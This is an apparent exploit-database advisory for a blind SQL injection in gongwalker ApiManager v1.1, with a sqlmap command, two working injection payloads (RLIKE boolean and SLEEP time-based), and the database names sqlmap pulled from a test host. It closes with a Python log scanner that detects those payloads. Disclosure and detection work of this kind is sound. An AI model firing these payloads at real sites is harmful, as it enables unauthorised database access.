Gongwalker API Manager 1.1 Blind SQL Injection

2016.02.12
Credit: HaHwul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

gongwalker API Manager v1.1 - Blind SQL Injection

# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
# Date: 2016-01-25
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/gongwalker/ApiManager
# Software Link: https://github.com/gongwalker/ApiManager.git
# Version: v1.1
# Tested on: Debian
#
# =================== Vulnerability Description ===================
# The tag parameter used by ApiManager's index.php is vulnerable:
http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1

# ========================= SqlMap Query ==========================
# sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag

# ================= SqlMap Result(get My Test DB) =================
Parameter: tag (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
---
[21:14:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[21:14:21] [INFO] fetching database names
[21:14:21] [INFO] fetching number of databases
[21:14:21] [INFO] resumed: 25
[21:14:21] [INFO] resumed: information_schema
[21:14:21] [INFO] resumed: "
[21:14:21] [INFO] resumed: ""
[21:14:21] [INFO] resumed: '
[21:14:21] [INFO] resumed: ''
[21:14:21] [INFO] resumed: '''
[21:14:21] [INFO] resumed: api
[21:14:21] [INFO] resumed: blackcat
[21:14:21] [INFO] resumed: edusec
...
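As an added detection example (not part of the advisory or the ApiManager project), the following Python scans web-server access logs for the request shapes visible in the sqlmap output above: a quote break followed by a subselect, a SLEEP() delay, and the trailing AND 'x'='x that rebalances the broken quote. The access-log lines are constructed for the example and mirror the two payloads shown.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (not real traffic). Line 1 is the benign
# request from the advisory; lines 2 and 3 carry the URL-encoded form of the
# boolean-based (RLIKE) and time-based (SLEEP) payloads reported by sqlmap.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jan/2016:21:14:21 +0900] "GET /vul_test/ApiManager/index.php?act=api&tag=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jan/2016:21:14:22 +0900] "GET /vul_test/ApiManager/index.php?act=api&tag=1%27%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%289435%3D9435%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%27uUNb%27%3D%27uUNb HTTP/1.1" 200 512 "-" "sqlmap/1.0"
10.0.0.5 - - [25/Jan/2016:21:14:28 +0900] "GET /vul_test/ApiManager/index.php?act=api&tag=1%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qakZ%29%20AND%20%27cSPF%27%3D%27cSPF HTTP/1.1" 200 512 "-" "sqlmap/1.0"
"""

# Request line inside a combined-log entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures are matched against the percent-decoded parameter value.
SIGNATURES = [
    # closing quote, boolean operator, then a subselect in the same value
    ("quote-break-subselect", re.compile(r"'\s*(?:AND|OR|RLIKE)\b.*\bSELECT\b", re.I | re.S)),
    # time-based blind probe
    ("time-delay", re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),
    # sqlmap-style tail that rebalances the quote: AND 'abcd'='abcd
    ("tautology-tail", re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\s*$", re.I)),
]


def scan_line(line):
    """Return a list of (parameter, signature) hits for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    hits = []
    # parse_qs percent-decodes values, so the regexes see the raw SQL fragment.
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            for name, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((param, name))
    return hits


def scan_log(text):
    """Map 1-based line numbers to their hits; clean lines are omitted."""
    results = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            results[lineno] = hits
    return results


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {hits}")
```

The time-based payload also trips the quote-break signature because it embeds a subselect; treating several signatures on one parameter as a higher-confidence alert is the intended use.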


Copyright 2024, cxsecurity.com